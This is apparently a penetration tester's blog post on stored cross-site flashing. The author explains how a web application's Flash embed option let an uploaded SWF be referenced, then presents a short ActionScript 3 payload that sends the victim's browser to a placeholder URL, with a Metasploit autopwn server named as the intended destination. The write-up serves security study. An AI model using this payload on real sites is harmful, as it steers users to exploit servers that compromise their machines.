Stored Cross-site Flashing?

The title for this post posed somewhat of a conundrum for me. That’s because I think technically, cross-site flashing is more about attacking a flash applet that already lives on a website.  But what if you are allowed to add one to said website?  Is attacking the document object model through an uploaded flash applet still cross-site flashing, is it stored cross-site scripting, or should it be called stored cross-site flashing?  I’m sure there really is a definition somewhere that at least two people have agreed upon. Anyways, I was looking at a web application that implemented pretty good cross-site scripting protection, it even uses the OWASP Antisamy libraries to sanitize untrusted data that is stored in the application. But with all that work in place it still allowed users to specify a location for a flash applet, but it didn’t actually allow the user to upload said applet to the server via the WYSIWYG editor I was attacking.  And I assume that the developers thought that this was sufficient to protect users, because it would cause the browser to enforce same origin policies against the remote flash applet.  (Not to mention someone could just point the object tag directly to a SWF file that started throwing exploits at Flash Player, cross-origin policy be damned.)  There were however other places in the application that a user could upload to though, even if not directly in the WYSIWYG editor.  So referencing these other locations was a simple task, just paste in the URL! I have theorized about using a similar attack vector for a while (because, it’s pretty obvious.) Of course I realize this attack isn’t anything unique by any means, but I wasn’t able to find any easy steps to do it … ultimately my goal was to redirect to a metasploit autopwn instance and do a demo of how this could be used to compromise systems.  The best part was that the flash object tag was actually getting embedded in a iframe inside of the main page, which made all this look totally innocent on the browser getting attacked.  So I compiled the following ActionScript 3 code using as3compile (from the swftools suite,) and it worked perfectly!
(cross-site-flash.as) download
1
2
3
4
5
6
7
8
9
10
11
12
13
package
{
 import flash.display.MovieClip
 import flash.net.*
 public class Main extends MovieClip
 {
 function Main() {
 var url:String = "CHANGE_TO_TARGET_URL";
 var urlReq:URLRequest = new URLRequest(url);
 navigateToURL(urlReq,"_self");
 }
 }
}